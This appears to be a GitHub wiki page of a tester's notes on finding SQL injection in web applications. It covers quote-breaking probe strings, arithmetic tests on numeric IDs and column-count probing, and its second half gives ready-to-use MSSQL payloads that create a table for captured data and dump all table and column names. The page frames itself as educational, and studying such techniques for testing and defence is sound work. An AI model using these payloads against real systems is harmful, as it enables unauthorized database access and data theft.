-
Notifications
You must be signed in to change notification settings - Fork 7
SQLi
Checking for SQLi can sometimes be very simple. The way I begin tackling SQL injection (not Blind SQLi) is to try just a few techniques. What is important is how you understand the response. Understanding the response will help determine if there may be an injection.
I start out normally just with a XSS style text input. I like to use '">asdf or something similar. If I can see that an error occurred or if the characters didn't encode in the response, I am on the path to finding something.
Sometimes you may not be able to close out the string due to some limitations of allowed characters. You may want to attempt string' and 'a'='a
If I am dealing with numbers I use the minus sign. This may require knowing two integers you have access to. If I have access to integer 4 and 1 but not 2 and 3, I can try things like 5-1 to see if it pulls record 4. I could try 4-3 to see if I can access item 1. I use the minus because certain applications will let you use + as a space. So if you didn't explicitly say %2b you may miss your injection.
If I see an item that looks like there may be a sort function, maybe name=StateName&sort=desc, then you may want to try swapping StateName with the number 1. Then swap it out with 9999. If 9999 errors and 1 does not, you may be able to tell how many columns are being returned to then run SQLmap if you'd like.
############## CREATING A TABLE TO STORE INJECTION DATA ##############
Create a table to inject into:
CREATE TABLE YOUNAMEYOURTABLE ( ID int IDENTITY(1,1) PRIMARY KEY, data varchar(8000));--Insert data into your table:
insert into YOUNAMEYOURTABLE (data) Select @@Version--Grab All the Database Tables into 1 record separated by a ';'
if not using a web application, replace the %2b with a +
%2bSTUFF((SELECT '; ' %2b TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE =
'BASE TABLE' AND TABLE_CATALOG='REPLACEME' FOR XML PATH('')), 1, 1, '')--Grab All the Table Columns into 1 record separated by a ';'
if not using a web application, replace the %2b with a +
SELECT 'PutTheTableNameHereForReference: ' %2bSTUFF((SELECT '; '
%2b column_name FROM TheDatabaseYouWantToQueryFrom.INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='REPLACEME'
FOR XML PATH('')), 1, 1, '')--Warning: All the information provided on this site is for educational purposes only. The site or the authors are not responsible for any misuse of the information. You shall not misuse the information to gain unauthorized access and/or write malicious programs. The information shall only be used to expand knowledge and not for causing malicious or damaging attacks.